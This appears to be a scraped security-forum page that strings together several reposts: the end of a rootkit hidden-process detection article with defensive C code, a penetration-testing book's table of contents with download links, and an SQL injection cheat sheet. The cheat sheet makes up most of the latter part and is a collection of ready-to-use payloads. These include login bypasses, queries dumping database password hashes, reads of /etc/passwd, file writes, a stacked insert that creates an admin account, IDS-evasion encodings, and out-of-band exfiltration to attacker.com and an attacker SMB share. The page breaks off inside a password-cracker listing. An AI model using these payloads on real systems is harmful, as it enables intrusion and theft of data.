order to be effective the magic number is doubled to take care of all possible running processes on latest operating systems. Here is the sample code that implements PIDB method: for(int i=0; i < 0x83B8; i+=4) { //These are system idle and system processes if( i == 0 || i==4 ) { continue; } hprocess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, i); if( hprocess == NULL ) { if( GetLastError() != ERROR_INVALID_PARAMETER) { // If the error code is other than // ERROR_INVALID_PARAMETER that means this // process exists but we are not able to open. //check if this process is already discovered //using standard API functions. if( IsHiddenProcess(i) ) { printf("\n Hidden process found %d", i); } } continue; } dwExitCode = 0; GetExitCodeProcess(hprocess, &dwExitCode); // check if this is active process... // only active process will return error // code as ERROR_NO_MORE_ITEMS if( dwExitCode == ERROR_NO_MORE_ITEMS ) { //check if this process is already discovered if( IsHiddenProcess(i) ) { printf("\n Hidden process found %d", i); } } CloseHandle(hprocess); } [TABLE] [TR] [TD]Though this is very effective method, rootkit can easily defeat this technique by hooking OpenProcess or its native version NTOpenProcess function and then returning NULL with error code as ERROR_INVALID_PARAMETER. To defend against such tricks anti-rootkit softwares can call NtOpenProcess using direct system call method as shown in "Detection of Hidden Process using Direct NT System Call Implemenation".[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]HPD with CSRSS Process Handle Enumeration [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Any windows process when run will have lot of open handles realted to process, thread, named objects, file, port, registry, etc. that can be used to detect hidden process. One can use the native API function. The effective way to enumerate handles is to use NtQuerySystemInformation with first parameter as SystemHandleInformation. It lists the handles from all running processes in the system. For each enumerated handle, it provides information such as handle, handle type and process id of the owning process. Hence, by enumerating through all the handles and then using the associated process id, one can detect all possible hidden processes that are not revealed through standard API functions. There is one interesting system process called CSRSS.EXE, which holds the handles to all running processes. So instead of going through all the different handles, one can just scroll through the process handles of CSRSS.EXE process. Interestingly this method can, not only detect userland hidden processes but also some of the rootkit processes which have used kernel land techniques without taking care of hiding process handles within CSRSS.EXE process. Here is the code snippet, which can demonstrate this method: [/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] PVOID bufHandleTable = malloc(dwSize); status = NtQuerySystemInformation (SystemHandleInformation, bufHandleTable, dwSize, 0); SYSTEM_HANDLE_INFORMATION *HandleInfo = (SYSTEM_HANDLE_INFORMATION *) bufHandleTable; // Process handles within CSRSS will not have handle // to following processes system idle process, system // process, smss.exe, csrss.exe. for(int i=0; i< HandleInfo->NumberOfHandles; i++) { int pid = HandleInfo->Handles[i].UniqueProcessId; // For XP & 2K3 : HANDLE_TYPE_PROCESS = 0x5 // For Vista & Longhorn : HANDLE_TYPE_PROCESS = 0x6 if( HandleInfo->Handles[i].ObjectTypeIndex == HANDLE_TYPE_PROCESS) { //check if this process id is that of CSRSS.EXE process. if( IsCSRSSProcess(pid) ) { hprocess = OpenProcess(PROCESS_DUP_HANDLE, false, pid); if( hprocess ) { if( DuplicateHandle(hprocess, (HANDLE)HandleInfo->Handles[i].Handle, GetCurrentProcess(), &tprocess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, 0)) { targetPid = GetProcessId(tprocess); //check if this is hidden process if( IsHiddenProcess(targetPid) ) { printf("\n Found hidden process %d", targetPid); } } }// End of if( hprocess ) } // End of if( IsCSRSSProcess(pid) ) } // End of if } // End of for-loop [TABLE] [TR] [TD]Since the CSRSS.EXE is not first process started when Windows boots, it does not contains handles to already started processes such as system idle process(pid=0), system process (pid=4), smss.exe and its process itself. On Windows Vista system it is possible to more than one CSRSS.EXE process in case of multiple users logged in. Same situation arises on XP system, when more than one user is operating through 'Switch User' mechanism. In such case, one has to check if the enumerated process belongs to any of these CSRSS process ids. The function IsCSRSSProcess() above does exactly the same by comparing the discovered process id with list of all running CSRSS.EXE processes. One more way is to enumerate all thread handles within CSRSS process instead of process handles, as most rootkits are aware of this technique. The CSRSS process not only has process handles but also thread handles for every running processes. Once the thread handle is known, one can use GetProcessIdOfThread function to get process id associated with that thread after duplicating it. Though any rootkit process can defeat this technique by hooking NtQuerySystemInformation or NtOpenProcess function, it can easily be circumvented by using direct implementation of these native API functions as described in the "Detection of Hidden Process using Direct NT System Call Implemenation". [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader]Other Methods of Detecting Hidden Processes [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] There exists several other userland methods to detect hidden rootkit processes, but they are not as effective as the ones described above. However they can be used on need basis and often to target specific rootkit. One such method is to enumerate through all the open Windows created by the processes within the system using EnumWindows API function and then calling the GetWindowThreadProcessId function to get the process id associated with that Window. Here is the sample code that does the same... [/TD] [/TR] [/TABLE] //Setup the callback function to enumerate through windows EnumWindows(EnumWindowsProc, NULL); //This is callback function to enumerate windows BOOL CALLBACK EnumWindowsProc(HWND hwnd, PARAM lParam) { DWORD procId; GetWindowThreadProcessId(hwnd, &procId); if( IsHiddenProcess(procId) ) { printf("Found hidden process %d", procId); } } [TABLE] [TR] [TD]There exist several other ways to detect the hidden processes in user land and new ways are being discovered everyday. Though these detection techniques can be easily defeated from kernel land, they present simple and less risky mechanism to uncover the userland rootkits.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]References [/TD] [/TR] [TR] [/TR] [TR] [TD]1. Detection of Hidden Processes 2. Hiding Rootkit process from CSRSS Handle Enumeration Method [/TD] [/TR] [/TABLE] Sursa: Hidden Rootkit Process Detection - www.SecurityXploded.com

[h=3]Attacking and Exploiting Wireless Drivers[/h] Here is the video recording of talk on attacking and exploiting wireless drivers in various clients. This presentation was delivered by Sylvester Keil and Clemens Kolbitsch at the Deepsec Conference. Sursa: SecurityXploded Forum • View topic - Attacking and Exploiting Wireless Drivers

Professional Penetration Testing Creating and Operating a Formal Hacking Lab Thomas Wilhelm Technical Editor Jan Kanclirz Jr. Pagini: 525 Acknowledgments ................................................................................ xvii Foreword ............................................................................................. xix PART 1 SETTING UP CHAPTER 1 Introduction ......................................................................... 3 Introduction ....................................................................... 3 About the Book .................................................................. 4 Target Audience ............................................................. 4 How to Use This Book .................................................... 5 About the DVD ................................................................... 7 Course Material .............................................................. 8 Reference Material .......................................................... 8 LiveCDs ......................................................................... 8 Summary ......................................................................... 10 Solutions Fast Track .......................................................... 10 About the Book ............................................................ 10 About the DVD ............................................................. 11 Reference ......................................................................... 11 CHAPTER 2 Ethics and Hacking ............................................................. 13 Introduction ..................................................................... 13 Why Stay Ethical? .............................................................. 15 Black Hat Hackers ......................................................... 15 White Hat Hackers ........................................................ 17 Gray Hat Hackers .......................................................... 18 Ethical Standards ............................................................... 19 Certifications ................................................................ 19 Contractor .................................................................... 19 Employer ..................................................................... 20 Educational and Institutional Organizations ....................... 21 Computer Crime Laws ........................................................ 24 Types of Laws ............................................................... 24 Type of Computer Crimes and Attacks ............................. 24 International Laws ......................................................... 30 Safe Harbor and Directive 95/46/EC ................................ 31 Getting Permission to Hack ................................................ 32 Confidentiality Agreement .............................................. 32 Company Obligations .................................................... 33 Contractor Obligations ................................................... 34 Auditing and Monitoring ................................................ 35 Conflict Management ..................................................... 35 Summary ......................................................................... 36 Solutions Fast Track .......................................................... 36 Why Stay Ethical? .......................................................... 36 Ethical Standards ........................................................... 37 Computer Crime Laws .................................................... 37 Getting Permission to Hack ............................................ 37 Frequently Asked Questions ............................................... 38 Expand Your Skills ............................................................ 38 References ........................................................................ 40 CHAPTER 3 Hacking as a Career ............................................................ 43 Introduction ..................................................................... 43 Career Paths ..................................................................... 45 Network Architecture ..................................................... 46 System Administration ................................................... 47 Applications and Databases ............................................ 48 Certifications .................................................................... 49 High-Level Certifications ................................................. 51 Skill- and Vendor-Specific Certifications ............................ 65 Associations and Organizations ........................................... 84 Professional Organizations .............................................. 85 Conferences .................................................................. 85 Local Communities ........................................................ 92 Mailing Lists ................................................................. 93 Summary ......................................................................... 94 Solutions Fast Track .......................................................... 95 Career Paths ................................................................. 95 Certifications ................................................................ 95 Associations and Organizations ....................................... 96 Frequently Asked Questions ............................................... 96 Expand Your Skills ............................................................ 97 CHAPTER 4 Setting Up Your Lab ........................................................... 101 Introduction .................................................................... 101 Personal Lab ................................................................... 102 Keeping it Simple ........................................................ 102 Equipment .................................................................. 102 Software ..................................................................... 103 Lab for Book Exercises ................................................. 103 Corporate Lab ................................................................. 106 Internal Labs ............................................................... 107 External Labs .............................................................. 107 Equipment .................................................................. 107 Software ..................................................................... 108 Protecting Penetration Test Data ........................................ 108 Encryption Schemas ..................................................... 108 Securing PenTest Systems ............................................. 110 Mobile Security Concerns .............................................. 111 Wireless Lab Data ........................................................ 112 Additional Network Hardware ........................................... 112 Routers ...................................................................... 113 Firewalls .................................................................... 113 Intrusion Detection System/Intrusion Prevention System . . . 114 Summary ........................................................................ 114 Solutions Fast Track ......................................................... 115 Personal Lab ............................................................... 115 Corporate Lab ............................................................. 115 Protecting Penetration Test Data .................................... 115 Additional Network Hardware ....................................... 115 Frequently Asked Questions .............................................. 116 Expand Your Skills .......................................................... 116 Reference ....................................................................... 117 CHAPTER 5 Creating and Using PenTest Targets in Your Lab ...................... 119 Introduction .................................................................... 119 Turn-Key Scenarios versus Real-World Targets ..................... 120 Problems with Learning to Hack .................................... 120 Real-World Scenarios ................................................... 121 Turn-Key Scenarios .......................................................... 122 What is a LiveCD? ........................................................ 123 De-ICE ....................................................................... 123 Hackerdemia ............................................................... 127 pWnOS ...................................................................... 128 Foundstone ................................................................. 131 Open Web Application Security Project ........................... 132 Using Exploitable Targets ................................................. 136 Operating Systems ....................................................... 136 Applications ................................................................ 137 Analyzing Malware – Viruses and Worms ............................ 137 Setting up a Lab .......................................................... 138 Other Target Ideas ........................................................... 144 CTF Events ................................................................. 145 Web-Based Challenges ................................................. 145 Vulnerability Announcements ........................................ 146 Summary ........................................................................ 147 Solutions Fast Track ......................................................... 148 Turn-Key Scenarios versus Real-World Targets ................. 148 Turn-Key Scenarios ...................................................... 148 Using Exploitable Targets ............................................. 148 Analyzing Malware – Viruses and Worms ........................ 148 Other Target Ideas ....................................................... 149 Frequently Asked Questions .............................................. 149 Expand Your Skills .......................................................... 150 References ...................................................................... 151 CHAPTER 6 Methodologies .................................................................. 153 Introduction .................................................................... 153 Project Management Body of Knowledge ............................ 154 Introduction to PMBOK ................................................ 155 Initiating Process Group ............................................... 155 Planning Process Group ............................................... 157 Executing Process Group .............................................. 161 Closing Process Group ................................................. 163 Monitoring and Controlling Process Group ...................... 163 Information System Security Assessment Framework ............ 166 Planning and Preparation – Phase I ................................ 166 Assessment – Phase II .................................................. 166 Reporting, Clean-up, and Destroy Artifacts – Phase III ...... 170 Open Source Security Testing Methodology Manual .............. 171 Rules of Engagement ................................................... 172 Channels .................................................................... 173 Modules ..................................................................... 175 Summary ........................................................................ 176 viii Contents Solutions Fast Track ......................................................... 177 Project Management Body of Knowledge ........................ 177 Information System Security Assessment Framework ........ 177 Open Source Security Testing Methodology Manual .......... 178 Frequently Asked Questions .............................................. 178 Expand Your Skills .......................................................... 179 References ...................................................................... 179 CHAPTER 7 PenTest Metrics ................................................................ 181 Introduction .................................................................... 181 Quantitative, Qualitative, and Mixed Methods ...................... 182 Quantitative Analysis .................................................... 182 Qualitative Analysis ...................................................... 183 Mixed Method Analysis ................................................. 185 Current Methodologies ..................................................... 186 Project Management Institute ........................................ 186 ISSAF ......................................................................... 191 OSSTMM .................................................................... 192 Tool-Generated Reports ................................................ 193 Summary ........................................................................ 194 Solutions Fast Track ......................................................... 195 Quantitative, Qualitative, and Mixed Methods .................. 195 Current Methodologies ................................................. 195 Frequently Asked Questions .............................................. 196 References ...................................................................... 196 CHAPTER 8 Management of a PenTest ................................................... 197 Introduction .................................................................... 197 Project Team Members ..................................................... 197 Roles and Responsibilities ............................................. 198 Organizational Structure ............................................... 202 Project Management ......................................................... 206 Initiating Stage ............................................................ 206 Planning Stage ............................................................ 208 Executing Stage ........................................................... 209 Monitoring and Controlling ........................................... 211 Closing Stage .............................................................. 211 Summary ........................................................................ 214 Solutions Fast Track ......................................................... 214 Project Team Members ................................................. 214 Project Management ..................................................... 214 Frequently Asked Questions .............................................. 215 Expand Your Skills .......................................................... 215 References ...................................................................... 216 PART 2 RUNNING A PENTEST CHAPTER 9 Information Gathering ......................................................... 219 Introduction .................................................................... 219 Passive Information Gathering ........................................... 221 Web Presence ............................................................. 222 Corporate Data ............................................................ 231 WHOIS and DNS Enumeration ...................................... 233 Additional Internet Resources ........................................ 236 Active Information Gathering ............................................ 238 DNS Interrogation ....................................................... 238 E-mail Accounts ........................................................... 240 Perimeter Network Identification ................................... 242 Network Surveying ...................................................... 246 Project Management ......................................................... 247 Executing Process Phase ............................................... 248 Monitoring and Control Process ..................................... 250 Summary ........................................................................ 253 Solutions Fast Track ......................................................... 253 Passive Information Gathering ....................................... 253 Active Information Gathering ........................................ 254 Project Management ..................................................... 254 Frequently Asked Questions .............................................. 254 Expand Your Skills .......................................................... 255 References ...................................................................... 257 CHAPTER 10 Vulnerability Identification ................................................... 259 Introduction .................................................................... 259 Port Scanning .................................................................. 260 Target Verification ....................................................... 261 UDP Scanning ............................................................. 264 TCP Scanning .............................................................. 265 Perimeter Avoidance Scanning ....................................... 268 System Identification ........................................................ 272 Active OS Fingerprinting .............................................. 272 Passive OS Fingerprinting ............................................. 272 x Contents Services Identification ...................................................... 275 Banner Grabbing ......................................................... 276 Enumerating Unknown Services .................................... 277 Vulnerability Identification ................................................ 278 Summary ........................................................................ 281 Solutions Fast Track ......................................................... 281 Port Scanning .............................................................. 281 System Identification .................................................... 282 Services Identification .................................................. 282 Vulnerability Identification ............................................ 282 Frequently Asked Questions .............................................. 282 Expand Your Skills .......................................................... 283 Reference ....................................................................... 284 CHAPTER 11 Vulnerability Verification ..................................................... 285 Introduction .................................................................... 285 Exploit Codes – Finding and Running ................................. 287 Internet Sites ............................................................... 287 Automated Tools ......................................................... 290 Exploit Codes – Creating Your Own ................................... 320 Fuzzing ...................................................................... 322 Code Review ............................................................... 324 Application Reversing .................................................. 324 Web Hacking .................................................................. 325 SQL Injection .............................................................. 326 Cross-Site Scripting ...................................................... 327 Web Application Vulnerabilities ..................................... 330 Project Management ......................................................... 332 Executing Process Phase ............................................... 332 Monitoring and Control Process ..................................... 333 Summary ........................................................................ 334 Solutions Fast Track ......................................................... 335 Exploit Codes – Finding and Running ............................. 335 Exploit Codes – Creating Your Own ............................... 335 Web Hacking .............................................................. 335 Project Management ..................................................... 335 Frequently Asked Questions .............................................. 336 Expand Your Skills .......................................................... 336 References ...................................................................... 338 CHAPTER 12 Compromising a System and Privilege Escalation ..................... 339 Introduction .................................................................... 339 System Enumeration ........................................................ 341 Internal Vulnerabilities ................................................. 341 Sensitive Data ............................................................. 347 Network Packet Sniffing ................................................... 348 Social Engineering ........................................................... 354 Baiting ....................................................................... 355 Phishing ..................................................................... 355 Pretexting ................................................................... 355 Wireless Attacks .............................................................. 356 Wi-Fi Protected Access Attack ........................................ 357 WEP Attack ................................................................. 362 Project Management ......................................................... 364 Executing Process Phase ............................................... 364 Monitoring and Control Process ..................................... 365 Summary ........................................................................ 365 Solutions Fast Track ......................................................... 366 System Enumeration .................................................... 366 Network Packet Sniffing ............................................... 367 Social Engineering ....................................................... 367 Wireless Attacks .......................................................... 367 Project Management ..................................................... 367 Frequently Asked Questions .............................................. 368 Expand Your Skills .......................................................... 368 References ...................................................................... 369 CHAPTER 13 Maintaining Access ........................................................... 371 Introduction .................................................................... 371 Shells and Reverse Shells .................................................. 372 Netcat Shell ................................................................ 372 Netcat Reverse Shell ..................................................... 376 Encrypted Tunnels ........................................................... 379 Adding a Host Firewall (Optional) ................................. 380 Setting Up the SSH Reverse Shell ................................... 381 Other Encryption and Tunnel Methods ............................... 386 Summary ........................................................................ 387 Solutions Fast Track ......................................................... 388 Shells and Reverse Shells .............................................. 388 Encrypted Tunnels ....................................................... 388 Other Encryption and Tunnel Methods ........................... 388 xii Contents Frequently Asked Questions .............................................. 389 Expand Your Skills .......................................................... 389 Reference ....................................................................... 390 CHAPTER 14 Covering Your Tracks ......................................................... 391 Introduction .................................................................... 391 Manipulating Log Data ..................................................... 392 User Login .................................................................. 392 Application Logs .......................................................... 396 Hiding Files .................................................................... 397 Hiding Files in Plain Sight ............................................ 398 Hiding Files Using the File System ................................. 399 Hiding Files in Windows .............................................. 402 Summary ........................................................................ 404 Solutions Fast Track ......................................................... 405 Manipulating Log Data ................................................. 405 Hiding Files ................................................................ 405 Frequently Asked Questions .............................................. 405 Expand Your Skills .......................................................... 406 Reference ....................................................................... 406 PART 3 WRAPPING EVERYTHING UP CHAPTER 15 Reporting Results .............................................................. 409 Introduction .................................................................... 409 What Should You Report? ................................................. 410 Out of Scope Issues ..................................................... 410 Findings ..................................................................... 411 Solutions .................................................................... 412 Manuscript Preparation ................................................ 412 Initial Report ................................................................... 414 Peer Reviews .............................................................. 415 Fact Checking ............................................................. 415 Metrics ....................................................................... 416 Final Report .................................................................... 425 Peer Reviews .............................................................. 425 Documentation ............................................................ 426 Summary ........................................................................ 437 Solutions Fast Track ......................................................... 438 What Should You Report? ............................................. 438 Initial Report ............................................................... 438 Final Report ................................................................ 438 Frequently Asked Questions .............................................. 439 Expand Your Skills .......................................................... 439 References ...................................................................... 441 CHAPTER 16 Archiving Data .................................................................. 443 Introduction .................................................................... 443 Should You Keep Data? .................................................... 443 Legal Issues ................................................................ 444 E-mail ........................................................................ 446 Findings and Reports ................................................... 446 Securing Documentation ................................................... 447 Access Controls ........................................................... 448 Archival Methods ......................................................... 448 Archival Locations ....................................................... 449 Destruction Policies ..................................................... 450 Summary ........................................................................ 450 Solutions Fast Track ......................................................... 451 Should You Keep Data? ................................................ 451 Securing Documentation ............................................... 451 Frequently Asked Questions .............................................. 451 Reference ....................................................................... 452 CHAPTER 17 Cleaning Up Your Lab ........................................................ 453 Introduction .................................................................... 453 Archiving Lab Data .......................................................... 454 Proof of Concepts ........................................................ 454 Malware Analysis ......................................................... 455 Creating and Using System Images ..................................... 455 License Issues ............................................................. 455 Virtual Machines .......................................................... 456 “Ghost” Images ........................................................... 456 Creating a “Clean Shop” ................................................... 457 Sanitization Methods .................................................... 458 Using Hashes .............................................................. 461 Change Management Controls ....................................... 461 Summary ........................................................................ 462 Solutions Fast Track ......................................................... 462 Archiving Lab Data ...................................................... 462 Creating and Using System Images ................................. 463 Creating a “Clean Shop” ............................................... 463 Frequently Asked Questions .............................................. 463 Reference ....................................................................... 463 xiv Contents CHAPTER 18 Planning for Your Next PenTest ............................................ 465 Introduction .................................................................... 465 Risk Management Register ................................................ 466 Creating a Risk Management Register ............................. 466 Prioritization of Risks and Responses ............................. 467 Knowledge Database ........................................................ 468 Creating a Knowledge Database ..................................... 468 Sanitization of Findings ................................................ 469 Project Management Knowledge Database ....................... 469 After-Action Review ......................................................... 470 Project Assessments ..................................................... 470 Team Assessments ....................................................... 471 Training Proposals ....................................................... 471 Summary ........................................................................ 473 Solutions Fast Track ......................................................... 473 Risk Management Register ............................................ 473 Knowledge Database .................................................... 474 After-Action Review ..................................................... 474 Frequently Asked Questions .............................................. 474 Expand Your Skills .......................................................... 475 Reference ....................................................................... 476 Appendix A: Acronyms ............................................................................. 477 Appendix B: Definitions ........................................................................... 489 Index .................................................................................................. 495 Download: http://rogunix.com/docs/Pentesting/Professional%20Penetration%20Testing:%20Creating%20and%20Operating%20a%20Formal%20Hacking%20Lab.pdf Mirror: http://www.megaupload.com/?d=Z7YUTFMR

[h=3]SQL Injection Pocket Reference 2010 Cheat Sheet [sqlI][/h] QL Injection Pocket Reference 2010 Great paper made by Reiners, .mario and lightos from sla.ckers.org 1. MySQL 1. Default Databases 2. Comment Out Query 3. Testing Injection 1. Strings 2. Numeric 3. In a login 4. Testing Version 5. MySQL-specific code 6. Retrieving DB usernames/passwords 7. Tables & Columns 1. Finding out column # 2. Retrieving Tables 3. Retrieving Columns 4. PROCEDURE ANALYSE() 5. Find Tables from Column Name 6. Find Column From Table Name 8. Avoiding the use of single/double quotations 9. String concatenation 10. Privileges 11. FILE privilege 1. MySQL 4/5 2. MySQL 5 12. Out Of Band Channeling 1. Timing 2. DNS (requires FILE privilege) 3. SMB (requires FILE privilege) 13. Reading Files (requires FILE privilege) 14. Writing Files (requires FILE privilege) 15. Stacked Queries with PDO 16. User Defined Functions 17. Fuzzing and Obfuscation 1. Allowed Intermediary Characters: 2. Allowed Intermediary Characters after AND/OR 18. Operators 19. Constants 20. MySQL Functions() 21. MySQL Password Hashing (Taken from MySQL website) 22. MySQL Password() Cracker 23. MySQL < 4.1 Password Cracker 2. MSSQL 1. Default Databases 2. Comment Out Query 3. Testing Version 4. Retrieving user names/passwords 5. Database Server Hostname 6. Listing Databases 7. Tables & Columns 1. Retrieving Tables 2. Retrieving Columns 3. Retrieving Multiple Tables/Columns at once 8. OPENROWSET Attacks 9. System Command Execution 10. SP_PASSWORD (Hiding Query) 11. Fuzzing and Obfuscation 1. Encodings 12. MSSQL Password Hashing 13. MSSQL Password Cracker 3. ORACLE 1. Default Databases 2. Comment Out Query 3. Testing Version 4. Retrieving Users/Passwords 5. Retrieving Databases 1. Current Database 2. User Databases 6. Tables & Columns 1. Retrieving Tables 2. Retrieving Columns 3. Finding Tables from Column Name 4. Finding Column From Table Name 7. Fuzzing and Obfuscation 1. Avoiding the use of single/double quotations 2. Unlike other RDBMS, Oracle allows us to reference table/column names encoded. 8. Out Of Band Channeling 1. Time Delay 2. Heavy Query Time delays Credits I would like to thank .mario, Reiners and everyone else who help me put this together. You can reach me at twitter.com/LightOS for any suggestions you may have or if there's something you think should be on here. Remember this is still a work in progress. MySQL Default Databases * mysql (Privileged) * information_schema (Version >= 5) Comment Out Query * # * /* * -- - * ; Example: ' OR 1=1 -- -' ORDER BY id; Testing Injection * False o The query is invalid (MySQL errors/missing content on website) * True o The query is valid (Content is displayed as usual) Strings * ' - False * '' - True * " - False * "" - True Numeric * AND 0 - False * AND 1 - True * 2-1 - 1 * 3-2 - 1 In a login * ' OR '1 * ' OR 1 -- - * '=' * 'like' * '=0-- - Example: * SELECT * FROM Users WHERE username = 'Mike' AND password = ''='' * " OR "" = " * " OR 1 = 1 -- - Example: SELECT * FROM Users WHERE username = 'Mike' AND password = 'anypassword' OR '' = '' Note: * You can use as many apostrophes/quotations as you want as long as they pair up * SELECT * FROM Articles WHERE id = '121'''''''''''''' - This is valid * It's also possible to continue the statement after the chain of quotes: SELECT '1'''''''"" UNION SELECT 2 # 1 and 2 * Quotes escape quotes: SELECT '1''' # 1' Testing Version * VERSION(); * @@VERSION; Example: ' AND MID(VERSION(),1,1) = '5 - True if MySQL version is 5 MySQL-specific code MySQL allows you to specify the version number after the exclamation mark. The syntax within the comment is only executed if the version is greater or equal to the specified version number. Example: UNION SELECT /*!50000 5,null;x%A0*//*!40000 4,null-- ,*//*!30000 3,null-- x*/,null-- - (UNION with 2 columns) Note: * You can use comments in between the name and the parenthesis * Example: VERSION/**/() * Output will contain -nt-log in case the DBMS runs on a Windows based machine Retrieving DB usernames/passwords * Database.Table: mysql.user (Privileged) * Columns: user, password * Current User: user(), system_user() Example: * UNION SELECT CONCAT(user, 0x3A, password) FROM mysql.user WHERE user = 'root' Tables & Columns Finding out column # * Order By: o ORDER BY 1 o ORDER BY 2 o ORDER BY ... Note: Keep incrementing the number until you get a False response. Example: * 1' ORDER BY 1-- - True * 1' ORDER BY 2-- - True * 1' ORDER BY 3-- - True * 1' ORDER BY 4-- - False (Only 3 Columns) * -1' UNION SELECT 1,2,3-- - * Error Based: o AND (SELECT * FROM SOME_TABLE) = 1 o Operand should contain 3 column(s) Note: This works if you know the table name you're after and error showing is enabled Retrieving Tables * Union: o UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; * Blind: o AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A' * Error: o AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) Note: * version=9 for MySQL 4 * version=10 for MySQL 5 Retrieving Columns * Union: o UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename' * Blind: o AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A' * Error: o AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) o AND (1,2,3) = (SELECT * FROM SOME_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1 * Procedure Analyse(): o Refer to PROCEDURE ANALYSE() below. Note: The GROUP_CONCAT() function allows grouping of the tables/columns, instead of viewing them one at a time. Note: * Output is limited to 1024 chars by default. * All default database table names: ~900 chars * All default database column names: ~6000 chars PROCEDURE ANALYSE() * 1 PROCEDURE ANALYSE() #get first column name * 1 LIMIT 1,1 PROCEDURE ANALYSE() #get second column name * 1 LIMIT 2,1 PROCEDURE ANALYSE() #get third column name Note: It is necessary that the webapp will display the first selected column of the SQL query you are injecting to. Find Tables from Column Name * SELECT table_name FROM information_schema.columns WHERE column_name = 'username'; - Finds the table names for any columns named username. * SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%'; - Finds the table names for any columns that contain the word user. Find Column From Table Name * SELECT column_name FROM information_schema.columns WHERE table_name = 'Users'; * SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%'; Avoiding the use of single/double quotations * UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username = 0x61646D696E * UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username = CHAR(97, 100, 109, 105, 110) String concatenation * SELECT concat('a','a','a') * SELECT'a' 'a' 'a'a * SELECT/*/'a'/*/ 'd'/*/ 'mi'/*/ 'n' Privileges FILE privilege MySQL 4/5 * ' UNION SELECT file_priv,null FROM mysql.user WHERE user = 'username * ' AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y MySQL 5 * ' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username% * ' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1)='Y Out Of Band Channeling Timing * BENCHMARK() * SLEEP() (MySQL 5) * IF(), (CASE()WHEN) * ' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('test')), false)) - ' DNS (requires FILE privilege) * SELECT LOAD_FILE(concat('\\\\foo.',(select MID(version(),1,1)),'.attacker.com\\')); SMB (requires FILE privilege) * ' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt Reading Files (requires FILE privilege) * LOAD_FILE() * UNION SELECT LOAD_FILE('/etc/passwd')-- - Note: * file must be located on the server host * the basedirectory for load_file() is the @@datadir * the file must be readable by the MySQL user * the file size must be less than max_allowed_packet * UNION SELECT @@max_allowed_packet (default value is 1047552 Byte) Writing Files (requires FILE privilege) * INTO OUTFILE/DUMPFILE * AND 1=0 UNION SELECT 'code', null INTO OUTFILE '/tmp/file Note: * you can’t overwrite files with INTO OUTFILE * INTO OUTFILE must be the last statement in the query * there is no way to encode the pathname, so quotes are required Stacked Queries with PDO Stacked queries are possible when PHP uses the PDO_MYSQL driver to make a connection to the database. Example: * AND 1=0; INSERT INTO Users(username,password,priv) VALUES ('BobbyTables', 'kl20da$$','admin'); User Defined Functions UDF -R S 10/6/10 10:56 AM Fuzzing and Obfuscation Allowed Intermediary Characters: * 09 * 10 * 0A * 0B * 0C * 0D * A0 Example: '%0A%09UNION%0CSELECT%10NULL%23 * 28 * 29 Example: union(select(column)from(table)) Note: URL Encoding your injection can sometimes be useful for IDS evasion. %75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31 Allowed Intermediary Characters after AND/OR * 2B * 2D * 7E Example: SELECT 1 FROM Test WHERE 1=1 AND-+-+-+-+~~((1)) $prefixes = array(" ", "+", "-", "~", "!", "@", " "); * 09 * 0A * 0B * 0D * 0C * 20 Example: SELECT 1 FROM information_schema%20%0C%20.%20%09tables; Operators $operators = array("^", "=", "!=", "%", "/", "*", "&", "&&", "|", "||", "<", ">", ">>", "<<", ">=", "<=", "<>", "<=>", "AND", "OR", "XOR", "DIV", "LIKE", "RLIKE", "SOUNDS LIKE", "REGEXP", "IS", "NOT"); Constants * current_user * null, \N * true, false MySQL Functions() MySQL Password Hashing (Taken from MySQL website) Prior to MySQL 4.1, password hashes computed by the PASSWORD() function are 16 bytes long. Such hashes look like this: +-----------------------------+ | PASSWORD('mypass') | +-----------------------------+ | 6f8c114b58f2ce9e | +-----------------------------+ As of MySQL 4.1, the PASSWORD() function has been modified to produce a longer 41-byte hash value: +-----------------------------------------------------------------------+ | PASSWORD('mypass') | +-----------------------------------------------------------------------+ | *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | +-----------------------------------------------------------------------+ MySQL Password() Cracker Cain & Abel, JTR are capable of cracking MySQL 3.x-6.x passwords. MySQL < 4.1 Password Cracker This tool is a high-speed brute-force password cracker for MySQL hashed passwords. It can break an 8-character password containing any printable ASCII characters in a matter of hours on an ordinary PC. /* This program is public domain. Share and enjoy. * * Example: * $ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast * $ MySQLfast 6294b50f67eda209 * Hash: 6294b50f67eda209 * Trying length 3 * Trying length 4 * Found pass: barf * * The MySQL password hash function could be strengthened considerably * by: * - making two passes over the password * - 